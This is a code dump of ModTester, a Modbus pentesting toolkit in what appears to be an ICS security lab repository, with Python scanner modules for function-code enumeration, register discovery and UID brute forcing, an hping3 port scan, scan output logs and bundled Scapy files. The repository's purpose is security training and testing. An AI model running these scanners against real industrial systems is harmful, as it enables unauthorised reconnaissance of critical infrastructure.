{}'.format(len(MEM[0])) 96 | 97 | for x in range(len(MEM[0])): 98 | print MEM[0][x]," ==>" ,MEM[1][x] 99 | -------------------------------------------------------------------------------- /attacker/modtester/Application/modules/modbus/scanner/getfunc.py: -------------------------------------------------------------------------------- 1 | import os 2 | import threading 3 | 4 | from System.Core.Global import * 5 | from System.Core.Colors import * 6 | from System.Core.Modbus import * 7 | from System.Lib import ipcalc 8 | 9 | class Module: 10 | 11 | 12 | info = { 13 | 'Name': 'Get Function', 14 | 'Author': ['@enddo'], 15 | 'Description': ("Enumeration Function on Modbus"), 16 | 17 | } 18 | options = { 19 | 'RHOSTS' :['' ,True ,'The target address range or CIDR identifier'], 20 | 'RPORT' :[502 ,False ,'The port number for modbus protocol'], 21 | 'UID' :[None ,True ,'Modbus Slave UID.'], 22 | 'Threads' :[1 ,False ,'The number of concurrent threads'], 23 | 'Output' :[True ,False ,'The stdout save in output directory'] 24 | } 25 | output = '' 26 | 27 | def exploit(self): 28 | 29 | moduleName = self.info['Name'] 30 | print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start' 31 | ips = list() 32 | for ip in ipcalc.Network(self.options['RHOSTS'][0]): 33 | ips.append(str(ip)) 34 | while ips: 35 | for i in range(int(self.options['Threads'][0])): 36 | if(len(ips) > 0): 37 | thread = threading.Thread(target=self.do,args=(ips.pop(0),)) 38 | thread.start() 39 | THREADS.append(thread) 40 | else: 41 | break 42 | for thread in THREADS: 43 | thread.join() 44 | if(self.options['Output'][0]): 45 | open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOSTS'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n') 46 | self.output = '' 47 | 48 | def printLine(self,str,color): 49 | self.output += str + '\n' 50 | if(str.find('[+]') != -1): 51 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 52 | elif(str.find('[-]') != -1): 53 | print str.replace('[-]',color + '[+]' + bcolors.ENDC) 54 | else: 55 | print str 56 | 57 | def do(self,ip): 58 | c = connectToTarget(ip,self.options['RPORT'][0]) 59 | if(c == None): 60 | self.printLine('[-] Modbus is not running on : ' + ip,bcolors.WARNING) 61 | return None 62 | self.printLine('[+] Looking for supported function codes on ' + ip,bcolors.OKGREEN) 63 | for i in range(0,256): # Total of 127 (legal) function codes 64 | ans = c.sr1(ModbusADU(transId=getTransId(),unitId=int(self.options['UID'][0]))/ModbusPDU_Read_Generic(funcCode=i),timeout=timeout, verbose=0) 65 | 66 | # We are using the raw data format, because not all function 67 | # codes are supported out by this library. 68 | if ans: 69 | data = str(ans) 70 | data2 = data.encode('hex') 71 | returnCode = int(data2[14:16],16) 72 | exceptionCode = int(data2[17:18],16) 73 | 74 | if returnCode > 127 and exceptionCode == 0x01: 75 | # If return function code is > 128 --> error code 76 | #print "Function Code "+str(i)+" not supported." 77 | a=1 78 | else: 79 | if(function_code_name.get(i) != None): 80 | self.printLine("[+] Function Code "+str(i)+"("+function_code_name.get(i)+") is supported.",bcolors.OKGREEN) 81 | 82 | else: 83 | self.printLine("[+] Function Code "+str(i)+" is supported.",bcolors.OKGREEN) 84 | 85 | else: 86 | self.printLine("[+] Function Code "+str(i)+" probably supported.",bcolors.OKGREEN) 87 | 88 | 89 | 90 | 91 | -------------------------------------------------------------------------------- /attacker/modtester/Application/modules/modbus/scanner/holdingRegisterDiscover.py: -------------------------------------------------------------------------------- 1 | import os 2 | import threading 3 | 4 | from System.Core.Global import * 5 | from System.Core.Colors import * 6 | from System.Core.Modbus import * 7 | from System.Lib import ipcalc 8 | 9 | 10 | 11 | 12 | class Module: 13 | 14 | 15 | info = { 16 | 'Name': 'Modbus Holding Register Discover', 17 | 'Author': ['@Danel'], 18 | 'Description': (" Modbus Holding Register Scanner"), 19 | 20 | } 21 | options = { 22 | 'RHOSTS' :['' ,True ,'The target address range or CIDR identifier'], 23 | 'RPORT' :[502 ,False ,'The port number for modbus protocol'], 24 | 'Threads' :[1 ,False ,'The number of concurrent threads'], 25 | 'UID' :[None ,True ,'Modbus Slave UID.'], 26 | 'Output' :[True ,False ,'The stdout save in output directory'] 27 | } 28 | 29 | output = '' 30 | 31 | def exploit(self): 32 | 33 | moduleName = self.info['Name'] 34 | print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start' 35 | ips = list() 36 | for ip in ipcalc.Network(self.options['RHOSTS'][0]): 37 | ips.append(str(ip)) 38 | while ips: 39 | for i in range(int(self.options['Threads'][0])): 40 | if(len(ips) > 0): 41 | thread = threading.Thread(target=self.do,args=(ips.pop(0),)) 42 | thread.start() 43 | THREADS.append(thread) 44 | else: 45 | break 46 | for thread in THREADS: 47 | thread.join() 48 | if(self.options['Output'][0]): 49 | open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOSTS'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n') 50 | self.output = '' 51 | 52 | def printLine(self,str,color): 53 | self.output += str + '\n' 54 | if(str.find('[+]') != -1): 55 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 56 | elif(str.find('[-]') != -1): 57 | print str.replace('[-]',color + '[-]' + bcolors.ENDC) 58 | else: 59 | print str 60 | 61 | def do(self,ip): 62 | c = connectToTarget(ip,self.options['RPORT'][0]) 63 | 64 | #Variables para recorre memoria y bloque de memoria a descubrir 65 | addressInt = 0 66 | MEM = [[],[]] 67 | top = addressInt + 10000 68 | 69 | if (c != None): 70 | 71 | 72 | while(addressInt <= top ): 73 | 74 | ans = c.sr1(ModbusADU(transId=getTransId(),unitId=int(self.options['UID'][0]))/ModbusPDU03_Read_Holding_Registers(startAddr=addressInt,quantity=1),timeout=timeout, verbose=0) 75 | ans = ModbusADU_Answer(str(ans)) 76 | #self.printLine('[+] Response is :',bcolors.OKGREEN) 77 | #ans.show() 78 | #print "Holding Register : {} ".format(addressInt) 79 | 80 | 81 | try: 82 | #La respuesta es correcta 83 | if(ans.funcCode != 0x83): 84 | MEM[0].append(addressInt) 85 | MEM[1].append(ans.registerVal) 86 | except: 87 | MEM[0].remove(addressInt) 88 | 89 | 90 | 91 | addressInt += 1 92 | 93 | sys.stdout.write("\rCorriendo : {} % ".format(addressInt/100)) 94 | sys.stdout.flush() 95 | print '\n' 96 | 97 | 98 | 99 | 100 | print '-------------------------------------------' 101 | print 'Holding Registers en memoria: {}'.format(len(MEM)) 102 | 103 | for x in range(len(MEM[0])): 104 | print MEM[0][x]," ==>" ,MEM[1][x] 105 | 106 | 107 | -------------------------------------------------------------------------------- /attacker/modtester/Application/modules/modbus/scanner/inputRegisterDiscover.py: -------------------------------------------------------------------------------- 1 | import os 2 | import threading 3 | 4 | from System.Core.Global import * 5 | from System.Core.Colors import * 6 | from System.Core.Modbus import * 7 | from System.Lib import ipcalc 8 | 9 | 10 | 11 | 12 | class Module: 13 | 14 | 15 | info = { 16 | 'Name': 'Modbus Input Register Discover', 17 | 'Author': ['@Danel'], 18 | 'Description': (" Modbus Input Register Scanner"), 19 | 20 | } 21 | options = { 22 | 'RHOSTS' :['' ,True ,'The target address range or CIDR identifier'], 23 | 'RPORT' :[502 ,False ,'The port number for modbus protocol'], 24 | 'Threads' :[1 ,False ,'The number of concurrent threads'], 25 | 'UID' :[None ,True ,'Modbus Slave UID.'], 26 | 'Output' :[True ,False ,'The stdout save in output directory'] 27 | } 28 | 29 | output = '' 30 | 31 | def exploit(self): 32 | 33 | moduleName = self.info['Name'] 34 | print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start' 35 | ips = list() 36 | for ip in ipcalc.Network(self.options['RHOSTS'][0]): 37 | ips.append(str(ip)) 38 | while ips: 39 | for i in range(int(self.options['Threads'][0])): 40 | if(len(ips) > 0): 41 | thread = threading.Thread(target=self.do,args=(ips.pop(0),)) 42 | thread.start() 43 | THREADS.append(thread) 44 | else: 45 | break 46 | for thread in THREADS: 47 | thread.join() 48 | if(self.options['Output'][0]): 49 | open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOSTS'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n') 50 | self.output = '' 51 | 52 | def printLine(self,str,color): 53 | self.output += str + '\n' 54 | if(str.find('[+]') != -1): 55 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 56 | elif(str.find('[-]') != -1): 57 | print str.replace('[-]',color + '[-]' + bcolors.ENDC) 58 | else: 59 | print str 60 | 61 | def do(self,ip): 62 | 63 | 64 | c = connectToTarget(ip,self.options['RPORT'][0]) 65 | 66 | #Variables para recorre memoria y bloque de memoria a descubrir 67 | addressInt = 0 68 | MEM = [[],[]] 69 | top = addressInt + 10000 70 | 71 | if (c != None): 72 | 73 | 74 | while(addressInt <= top ): 75 | 76 | ans = c.sr1(ModbusADU(transId=getTransId(),unitId=int(self.options['UID'][0]))/ModbusPDU04_Read_Input_Registers(startAddr=addressInt,quantity=1),timeout=timeout, verbose=0) 77 | ans = ModbusADU_Answer(str(ans)) 78 | #self.printLine('[+] Response is :',bcolors.OKGREEN) 79 | #ans.show() 80 | #print "Input Register : {} ".format(addressInt) 81 | 82 | try: 83 | #La respuesta es correcta 84 | if(ans.funcCode != 0x83): 85 | MEM[0].append(addressInt) 86 | MEM[1].append(ans.registerVal) 87 | except: 88 | MEM[0].remove(addressInt) 89 | 90 | addressInt += 1 91 | 92 | sys.stdout.write("\rCorriendo : {} % ".format(addressInt/100)) 93 | sys.stdout.flush() 94 | print '\n' 95 | 96 | 97 | 98 | print '-------------------------------------------' 99 | print 'Input Registers en memoria: {}'.format(len(MEM[0])) 100 | 101 | try: 102 | 103 | for x in range(len(MEM[0])): 104 | print MEM[0][x]," ==>" ,MEM[1][x] 105 | 106 | except: 107 | pass 108 | -------------------------------------------------------------------------------- /attacker/modtester/Application/modules/modbus/scanner/portDiscover.py: -------------------------------------------------------------------------------- 1 | import os 2 | import threading 3 | import subprocess 4 | 5 | from System.Core.Global import * 6 | from System.Core.Colors import * 7 | from System.Core.Modbus import * 8 | from System.Lib import ipcalc 9 | 10 | class Module: 11 | 12 | 13 | info = { 14 | 'Name': 'Port scanner ', 15 | 'Author': ['@Danel'], 16 | 'Description': (" Port scan with Hping "), 17 | 18 | } 19 | options = { 20 | 'RHOSTS' :['' ,True ,'The target address range or CIDR identifier'], 21 | 'PCOUNT' :[1000 ,False ,'The number of ports to scan'], 22 | 'Output' :[True ,False ,'The stdout save in output directory'] 23 | } 24 | output = '' 25 | 26 | def exploit(self): 27 | self.printLine('[+] Port scanning started:',bcolors.OKGREEN) 28 | print "hping3 -S -8 1-%s %s" %(self.options['PCOUNT'][0],self.options['RHOSTS'][0]) 29 | flood = os.system("/usr/sbin/hping3 -S -8 1-%s %s" %(self.options['PCOUNT'][0],self.options['RHOSTS'][0])) 30 | #subprocess.Popen(["./hping.sh"],stdin=subprocess.None) 31 | 32 | 33 | 34 | 35 | def printLine(self,str,color): 36 | self.output += str + '\n' 37 | if(str.find('[+]') != -1): 38 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 39 | elif(str.find('[-]') != -1): 40 | print str.replace('[-]',color + '[+]' + bcolors.ENDC) 41 | else: 42 | print str 43 | 44 | 45 | -------------------------------------------------------------------------------- /attacker/modtester/Application/modules/modbus/scanner/uid.py: -------------------------------------------------------------------------------- 1 | import os 2 | import threading 3 | 4 | from System.Core.Global import * 5 | from System.Core.Colors import * 6 | from System.Core.Modbus import * 7 | from System.Lib import ipcalc 8 | 9 | class Module: 10 | 11 | 12 | info = { 13 | 'Name': 'Brute Force UID', 14 | 'Author': ['@enddo'], 15 | 'Description': ("Brute Force UID"), 16 | 17 | } 18 | options = { 19 | 'RHOSTS' :['' ,True ,'The target address range or CIDR identifier'], 20 | 'RPORT' :[502 ,False ,'The port number for modbus protocol'], 21 | 'Function' :[1 ,False ,'Function code, Defualt:Read Coils.'], 22 | 'Threads' :[1 ,False ,'The number of concurrent threads'], 23 | 'Output' :[True ,False ,'The stdout save in output directory'] 24 | } 25 | output = '' 26 | 27 | def exploit(self): 28 | 29 | moduleName = self.info['Name'] 30 | print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start' 31 | ips = list() 32 | for ip in ipcalc.Network(self.options['RHOSTS'][0]): 33 | ips.append(str(ip)) 34 | while ips: 35 | for i in range(int(self.options['Threads'][0])): 36 | if(len(ips) > 0): 37 | thread = threading.Thread(target=self.do,args=(ips.pop(0),)) 38 | thread.start() 39 | THREADS.append(thread) 40 | else: 41 | break 42 | for thread in THREADS: 43 | thread.join() 44 | if(self.options['Output'][0]): 45 | open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOSTS'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n') 46 | self.output = '' 47 | 48 | def printLine(self,str,color): 49 | self.output += str + '\n' 50 | if(str.find('[+]') != -1): 51 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 52 | elif(str.find('[-]') != -1): 53 | print str.replace('[-]',color + '[+]' + bcolors.ENDC) 54 | else: 55 | print str 56 | 57 | def do(self,ip): 58 | self.printLine('[+] Start Brute Force UID on : ' + ip,bcolors.OKGREEN) 59 | for i in range(1,255): # Total of 255 (legal) uid 60 | c = connectToTarget(ip,self.options['RPORT'][0]) 61 | if(c == None): 62 | break 63 | try: 64 | 65 | c.sr1(ModbusADU(transId=getTransId(),unitId=i)/ModbusPDU_Read_Generic(funcCode=1),timeout=timeout, verbose=0) 66 | self.printLine('[+] UID on ' + ip + ' is : ' + str(i),bcolors.OKGREEN) 67 | closeConnectionToTarget(c) 68 | except Exception,e: 69 | closeConnectionToTarget(c) 70 | pass 71 | 72 | 73 | -------------------------------------------------------------------------------- /attacker/modtester/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu 2 | # ... 3 | ENV DEBIAN_FRONTEND noninteractive 4 | RUN apt-get update && \ 5 | apt-get -y install python && \ 6 | apt-get -y install libpcap-dev &&\ 7 | apt-get -y install hping3 &&\ 8 | rm -rf /var/lib/apt/lists/* -------------------------------------------------------------------------------- /attacker/modtester/Output/Brute Force UID_214.67.123.45.txt: -------------------------------------------------------------------------------- 1 | ============================== 2 | [+] Start Brute Force UID on : 214.67.123.45 3 | 4 | 5 | -------------------------------------------------------------------------------- /attacker/modtester/Output/Get Function_192.168.127.82.txt: -------------------------------------------------------------------------------- 1 | ============================== 2 | [+] Looking for supported function codes on 192.168.127.82 3 | [+] Function Code 1(Read Coils) is supported. 4 | [+] Function Code 2(Read Discrete Inputs) is supported. 5 | [+] Function Code 3(Read Multiple Holding Registers) is supported. 6 | [+] Function Code 4(Read Input Registers) is supported. 7 | [+] Function Code 5(Write Single Coil) is supported. 8 | [+] Function Code 6(Write Single Holding Register) is supported. 9 | [+] Function Code 7(Read Exception Status) is supported. 10 | [+] Function Code 8(Diagnostic) is supported. 11 | [+] Function Code 11(Get Com Event Counter) is supported. 12 | [+] Function Code 12(Get Com Event Log) is supported. 13 | 14 | 15 | ============================== 16 | [+] Looking for supported function codes on 192.168.127.82 17 | 18 | 19 | ============================== 20 | [+] Looking for supported function codes on 192.168.127.82 21 | [+] Function Code 1(Read Coils) is supported. 22 | [+] Function Code 2(Read Discrete Inputs) is supported. 23 | [+] Function Code 3(Read Multiple Holding Registers) is supported. 24 | [+] Function Code 4(Read Input Registers) is supported. 25 | [+] Function Code 5(Write Single Coil) is supported. 26 | [+] Function Code 6(Write Single Holding Register) is supported. 27 | [+] Function Code 15(Write Multiple Coils) is supported. 28 | [+] Function Code 16(Write Multiple Holding Registers) is supported. 29 | 30 | 31 | -------------------------------------------------------------------------------- /attacker/modtester/Output/Modbus Coil Discover_192.168.127.82.txt: -------------------------------------------------------------------------------- 1 | ============================== 2 | 3 | 4 | ============================== 5 | 6 | 7 | ============================== 8 | 9 | 10 | -------------------------------------------------------------------------------- /attacker/modtester/Output/Modbus Discover_192.168.127.82.txt: -------------------------------------------------------------------------------- 1 | ============================== 2 | [-] Modbus is not running on : 192.168.127.82 3 | 4 | 5 | ============================== 6 | [-] Modbus is not running on : 192.168.127.82 7 | 8 | 9 | ============================== 10 | [-] Modbus is not running on : 192.168.127.82 11 | 12 | 13 | ============================== 14 | [-] Modbus is not running on : 192.168.127.82 15 | 16 | 17 | ============================== 18 | [-] Modbus is not running on : 192.168.127.82 19 | 20 | 21 | ============================== 22 | [+] Modbus is running on : 192.168.127.82 23 | 24 | 25 | ============================== 26 | [+] Modbus is running on : 192.168.127.82 27 | 28 | 29 | ============================== 30 | [+] Modbus is running on : 192.168.127.82 31 | 32 | 33 | -------------------------------------------------------------------------------- /attacker/modtester/Output/Modbus Holding Register Discover_192.168.127.82.txt: -------------------------------------------------------------------------------- 1 | ============================== 2 | 3 | 4 | ============================== 5 | 6 | 7 | ============================== 8 | 9 | 10 | -------------------------------------------------------------------------------- /attacker/modtester/Output/Modbus Input Register Discover_192.168.127.82.txt: -------------------------------------------------------------------------------- 1 | ============================== 2 | 3 | 4 | ============================== 5 | 6 | 7 | ============================== 8 | 9 | 10 | -------------------------------------------------------------------------------- /attacker/modtester/Output/output: -------------------------------------------------------------------------------- 1 | #output files 2 | -------------------------------------------------------------------------------- /attacker/modtester/README.md: -------------------------------------------------------------------------------- 1 | #ModTester 2 | ModTester es un framework unificado de pentesting para el protocolo Modbus. 3 | En esta herramienta se han intentado recopilado diferentes herramientas para explotar vulnerabilidades. Creando asi un toolkit mas accesible con muchas herramientas diferentes para el mismo protocolo. 4 | 5 | ##Demo 6 | ``` 7 | sudo python modTester.py 8 | < ModTester > 9 | ------- 10 | ________ 11 | |\ /| | ________ 12 | | \_/ | _ _| | __ __ | __ __ 13 | | |/ \/ | | /_ /_ | /_ |_\ 14 | | |\_/\_/ | \__ _/ | \__ | \ 15 | 16 | 17 | --=[MODBUS Pentesting Toolkit 18 | --+--=[Version : 1.0 19 | --+--=[Modules : 13 20 | --+--=[Coder : Danel Lopez 21 | --=[github : www.github.com/dangoro94 22 | 23 | ModTester > help 24 | 25 | Command Description 26 | ------- ----------- 27 | back Move back from the current context 28 | exit Exit the console 29 | exploit Run module 30 | help Help menu 31 | show Displays modules of a given type, or all modules 32 | set Sets a variable to a value 33 | use Selects a module by name 34 | ``` 35 | -------------------------------------------------------------------------------- /attacker/modtester/System/Core/Banner.py: -------------------------------------------------------------------------------- 1 | from Colors import bcolors 2 | 3 | def Banner(version,modulesNum): 4 | print ' _______ ' 5 | print '< ModTester >' 6 | print ' ------- ' 7 | print ' ________ ' 8 | print '|\ /| | ________ ' 9 | print '| \_/ | _ _| | __ __ | __ __ ' 10 | print '| |/ \/ | | /_ /_ | /_ |_\ ' 11 | print '| |\_/\_/ | \__ _/ | \__ | \ ' 12 | print '\n' 13 | print ' '*10 + '--=' + bcolors.OKBLUE + '[' + bcolors.ENDC + bcolors.BOLD + 'MODBUS' + bcolors.ENDC +' Pentesting Toolkit' 14 | print ' '*7 + '--+--=' + bcolors.OKBLUE + '[' + bcolors.ENDC + 'Version : ' + bcolors.OKGREEN + bcolors.BOLD + '1.0' + bcolors.ENDC + bcolors.ENDC 15 | print ' '*7 + '--+--=' + bcolors.OKBLUE + '[' + bcolors.ENDC + 'Modules : ' + bcolors.OKGREEN + bcolors.BOLD + str(modulesNum) + bcolors.ENDC + bcolors.ENDC 16 | print ' '*7 + '--+--=' + bcolors.OKBLUE + '[' + bcolors.ENDC + 'Coder : ' + bcolors.OKGREEN + bcolors.BOLD + 'Danel Lopez' + bcolors.ENDC + bcolors.ENDC 17 | print ' '*10 + '--=' + bcolors.OKBLUE + '[' + bcolors.ENDC + 'github : ' + bcolors.OKGREEN + bcolors.BOLD + 'www.github.com/dangoro94' + bcolors.ENDC + bcolors.ENDC 18 | print ' ' 19 | 20 | 21 | -------------------------------------------------------------------------------- /attacker/modtester/System/Core/Colors.py: -------------------------------------------------------------------------------- 1 | class bcolors: 2 | HEADER = '\033[95m' 3 | OKBLUE = '\033[94m' 4 | OKGREEN = '\033[92m' 5 | WARNING = '\033[93m' 6 | FAIL = '\033[91m' 7 | ENDC = '\033[0m' 8 | BOLD = '\033[1m' 9 | UNDERLINE = '\033[4m' -------------------------------------------------------------------------------- /attacker/modtester/System/Core/Global.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | 4 | mainPath = os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir, os.path.pardir)) 5 | modulesPath = os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir, os.path.pardir)) + '/Application/modules/' 6 | VERSION = '1.0.4' 7 | pluginNumber = 0 8 | modules = None 9 | POINTER = None 10 | THREADS = list() 11 | timeout = 1 12 | -------------------------------------------------------------------------------- /attacker/modtester/System/Core/Loader.py: -------------------------------------------------------------------------------- 1 | import os 2 | import imp 3 | 4 | class plugins: 5 | pluginTree = list() 6 | modules = dict() 7 | def __init__(self,path): 8 | self.path = path 9 | def crawler(self): 10 | for top,dirs,files in os.walk(self.path): 11 | for sub in files: 12 | if(sub.endswith('.py')): 13 | self.pluginTree.append(os.path.join(top,sub).replace(self.path,'').replace('.py','').split('/')) 14 | 15 | def load(self): 16 | for plugin in self.pluginTree: 17 | name = plugin[-1] 18 | item = '/'.join(plugin) 19 | self.modules.update({item:imp.load_source(name, self.path + item + '.py').Module()}) 20 | 21 | -------------------------------------------------------------------------------- /attacker/modtester/System/Core/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/attacker/modtester/System/Core/__init__.py -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/attacker/modtester/System/Lib/__init__.py -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | Scapy: create, send, sniff, dissect and manipulate network packets. 8 | 9 | Usable either from an interactive console or as a Python library. 10 | http://www.secdev.org/projects/scapy 11 | """ 12 | 13 | if __name__ == "__main__": 14 | from scapy.main import interact 15 | interact() 16 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/all.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | Aggregate top level objects from all Scapy modules. 8 | """ 9 | 10 | from base_classes import * 11 | from config import * 12 | from dadict import * 13 | from data import * 14 | from error import * 15 | from themes import * 16 | from arch import * 17 | 18 | from plist import * 19 | from fields import * 20 | from packet import * 21 | from asn1fields import * 22 | from asn1packet import * 23 | 24 | from utils import * 25 | from route import * 26 | if conf.ipv6_enabled: 27 | from utils6 import * 28 | from route6 import * 29 | from sendrecv import * 30 | from supersocket import * 31 | from volatile import * 32 | from as_resolvers import * 33 | 34 | from ansmachine import * 35 | from automaton import * 36 | from autorun import * 37 | 38 | from main import * 39 | 40 | from layers.all import * 41 | 42 | from asn1.asn1 import * 43 | from asn1.ber import * 44 | from asn1.mib import * 45 | 46 | from crypto import * 47 | 48 | from pipetool import * 49 | from scapypipes import * 50 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/arch/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | Operating system specific functionality. 8 | """ 9 | 10 | 11 | import sys,os,socket 12 | from scapy.error import * 13 | import scapy.config 14 | 15 | try: 16 | import Gnuplot 17 | GNUPLOT=1 18 | except ImportError: 19 | log_loading.info("Can't import python gnuplot wrapper . Won't be able to plot.") 20 | GNUPLOT=0 21 | 22 | try: 23 | import pyx 24 | PYX=1 25 | except ImportError: 26 | log_loading.info("Can't import PyX. Won't be able to use psdump() or pdfdump().") 27 | PYX=0 28 | 29 | 30 | def str2mac(s): 31 | return ("%02x:"*6)[:-1] % tuple(map(ord, s)) 32 | 33 | 34 | 35 | def get_if_addr(iff): 36 | return socket.inet_ntoa(get_if_raw_addr(iff)) 37 | 38 | def get_if_hwaddr(iff): 39 | addrfamily, mac = get_if_raw_hwaddr(iff) 40 | if addrfamily in [ARPHDR_ETHER,ARPHDR_LOOPBACK]: 41 | return str2mac(mac) 42 | else: 43 | raise Scapy_Exception("Unsupported address family (%i) for interface [%s]" % (addrfamily,iff)) 44 | 45 | 46 | LINUX=sys.platform.startswith("linux") 47 | OPENBSD=sys.platform.startswith("openbsd") 48 | FREEBSD=sys.platform.startswith("freebsd") 49 | NETBSD = sys.platform.startswith("netbsd") 50 | DARWIN=sys.platform.startswith("darwin") 51 | SOLARIS=sys.platform.startswith("sunos") 52 | WINDOWS=sys.platform.startswith("win32") 53 | 54 | X86_64 = not WINDOWS and (os.uname()[4] == 'x86_64') 55 | 56 | 57 | # Next step is to import following architecture specific functions: 58 | # def get_if_raw_hwaddr(iff) 59 | # def get_if_raw_addr(iff): 60 | # def get_if_list(): 61 | # def get_working_if(): 62 | # def attach_filter(s, filter): 63 | # def set_promisc(s,iff,val=1): 64 | # def read_routes(): 65 | # def get_if(iff,cmd): 66 | # def get_if_index(iff): 67 | 68 | 69 | 70 | if LINUX: 71 | from linux import * 72 | if scapy.config.conf.use_pcap or scapy.config.conf.use_dnet: 73 | from pcapdnet import * 74 | elif OPENBSD or FREEBSD or NETBSD or DARWIN: 75 | from bsd import * 76 | elif SOLARIS: 77 | from solaris import * 78 | elif WINDOWS: 79 | from windows import * 80 | 81 | if scapy.config.conf.iface is None: 82 | scapy.config.conf.iface = LOOPBACK_NAME 83 | 84 | 85 | def get_if_raw_addr6(iff): 86 | """ 87 | Returns the main global unicast address associated with provided 88 | interface, in network format. If no global address is found, None 89 | is returned. 90 | """ 91 | r = filter(lambda x: x[2] == iff and x[1] == IPV6_ADDR_GLOBAL, in6_getifaddr()) 92 | if len(r) == 0: 93 | return None 94 | else: 95 | r = r[0][0] 96 | return inet_pton(socket.AF_INET6, r) 97 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/arch/bsd.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | Support for BSD-like operating systems such as FreeBSD, OpenBSD and Mac OS X. 8 | """ 9 | 10 | LOOPBACK_NAME="lo0" 11 | 12 | from unix import * 13 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/arch/solaris.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | Customization for the Solaris operation system. 8 | """ 9 | 10 | # IPPROTO_GRE is missing on Solaris 11 | import socket 12 | socket.IPPROTO_GRE = 47 13 | 14 | LOOPBACK_NAME="lo0" 15 | 16 | from unix import * 17 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/asn1/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | Package holding ASN.1 related modules. 8 | """ 9 | 10 | # We do not import mib.py because it is more bound to scapy and 11 | # less prone to be used in a standalone fashion 12 | __all__ = ["asn1","ber"] 13 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/asn1packet.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | Packet holding data in Abstract Syntax Notation (ASN.1). 8 | """ 9 | 10 | from packet import * 11 | 12 | class ASN1_Packet(Packet): 13 | ASN1_root = None 14 | ASN1_codec = None 15 | def init_fields(self): 16 | flist = self.ASN1_root.get_fields_list() 17 | self.do_init_fields(flist) 18 | self.fields_desc = flist 19 | def self_build(self): 20 | if self.raw_packet_cache is not None: 21 | return self.raw_packet_cache 22 | return self.ASN1_root.build(self) 23 | def do_dissect(self, x): 24 | return self.ASN1_root.dissect(self, x) 25 | 26 | 27 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/contrib/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | Package of contrib modules that have to be loaded explicitly. 8 | """ 9 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/contrib/avs.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | # http://trac.secdev.org/scapy/ticket/82 4 | 5 | # scapy.contrib.description = AVS WLAN Monitor Header 6 | # scapy.contrib.status = loads 7 | 8 | from scapy.packet import * 9 | from scapy.fields import * 10 | from scapy.layers.dot11 import * 11 | 12 | AVSWLANPhyType = { 0 : "Unknown", 13 | 1 : "FHSS 802.11 '97", 14 | 2 : "DSSS 802.11 '97", 15 | 3 : "IR Baseband", 16 | 4 : "DSSS 802.11b", 17 | 5 : "PBCC 802.11b", 18 